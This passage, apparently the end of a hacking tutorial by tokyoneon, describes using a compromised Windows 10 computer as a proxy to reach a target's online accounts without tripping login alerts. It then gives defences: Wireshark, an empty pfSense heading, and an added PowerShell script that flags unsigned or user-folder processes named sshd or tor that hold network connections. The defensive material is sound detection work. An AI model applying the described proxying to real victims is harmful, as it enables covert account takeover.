The same concept applies to websites like Twitter and Gmail, making it possible to access the target's accounts without raising too many red flags: these sites see the login originating from the same IP address the Windows 10 computer uses.
It's important to note that this demonstrates only one way an attacker can use a compromised computer as a proxy. In earlier drafts of this article, the target's router and Windows 10 firewall were modified to allow port forwarding and remote access, which would also let an attacker reach the SSH server from anywhere in the world.
Furthermore, admin privileges are not always required. Tor, for example, can be downloaded and run without special permissions, and it can be configured to forward requests to any service or port on the network, without an SSH server or SOCKS5 proxy at all.
These attacks were tested on fully patched Windows 10 systems running Avast and AVG antivirus software, so I can't recommend those as a solution. Readers will need to actively inspect running processes, look for shady software, and monitor traffic leaving their systems.
1. Inspect Outgoing Traffic with Wireshark
Wireshark is a great packet-capture tool for observing packets leaving the network. If an attacker is using Tor, for example, the IP address of the Tor relay the machine talks to can be looked up on ExoneraTor. Similarly, a plaintext Netcat backdoor is easy to spot in a Wireshark capture.
2. Create Strict Firewall Rules with pfSense
3. Inspect Running Processes

This approach isn't always entirely effective: process names can be changed or spoofed. But a lazy hacker may leave the file names at their defaults (e.g., "tor.exe"), making them easier to spot on a compromised Windows 10 system. Both an OpenSSH and a Tor process running in the background can be identified in the Windows 10 Task Manager.
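Task Manager only shows names, which is exactly what a careful attacker changes. The following added example (not code from the original article) hunts for the traits that survive a rename: a process that holds network sockets and runs from a user-writable folder, lacks a valid Authenticode signature, or still carries the default names sshd or tor. Run it from an elevated PowerShell so every process's image path is readable; as a normal user it only covers your own processes. The folder pattern is an assumption about typical drop locations and should be extended for your environment.

```powershell
# Added example (not from the original article): list processes with listening or
# established TCP sockets that look out of place. Needs Windows 8 / Server 2012 or later.
function Find-SuspiciousNetworkProcesses {
    param(
        # Assumption: folders a normal user can write to. Matches any user's profile.
        [string]$UserWritablePattern = '\\(AppData|Temp|Downloads|Public)\\'
    )

    # Listening sockets and established outbound connections, grouped by owning PID.
    $conns = Get-NetTCPConnection |
        Where-Object { $_.State -eq 'Listen' -or $_.State -eq 'Established' }

    foreach ($g in ($conns | Group-Object -Property OwningProcess)) {
        $p = Get-Process -Id ([int]$g.Name) -ErrorAction SilentlyContinue
        if (-not $p -or -not $p.Path) { continue }   # System/Idle, or no access to the image path

        $inUserDir = $p.Path -match $UserWritablePattern
        $sig       = Get-AuthenticodeSignature -FilePath $p.Path -ErrorAction SilentlyContinue
        $signed    = [bool]($sig -and $sig.Status -eq 'Valid')   # catalog-signed OS files count as Valid
        $knownName = $p.ProcessName -in @('sshd', 'tor')

        if (-not ($inUserDir -or -not $signed -or $knownName)) { continue }

        $listening = ($g.Group | Where-Object State -eq 'Listen' |
                      Select-Object -ExpandProperty LocalPort | Sort-Object -Unique) -join ','
        $remote    = ($g.Group | Where-Object State -eq 'Established' |
                      ForEach-Object { "$($_.RemoteAddress):$($_.RemotePort)" } |
                      Sort-Object -Unique) -join ' '

        [PSCustomObject]@{
            PID       = $p.Id
            Name      = $p.ProcessName
            Path      = $p.Path
            Signed    = $signed
            UserDir   = $inUserDir
            Listening = $listening
            Remote    = $remote   # peers of a suspected tor.exe can be checked on ExoneraTor
        }
    }
}

Find-SuspiciousNetworkProcesses | Format-Table -AutoSize
```

Expect some noise from unsigned third-party software; the combination that matters here is a binary under Temp or AppData with an outbound connection, or anything at all listening on port 22 that Get-Service sshd does not account for. The remote peers of a flagged process are what you feed to ExoneraTor, as described under the Wireshark step above.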
Stay vigilant. Never underestimate your worth to a hacker, and keep finding new ways to protect yourself. Follow me on Twitter @tokyoneon_ if you enjoyed this article.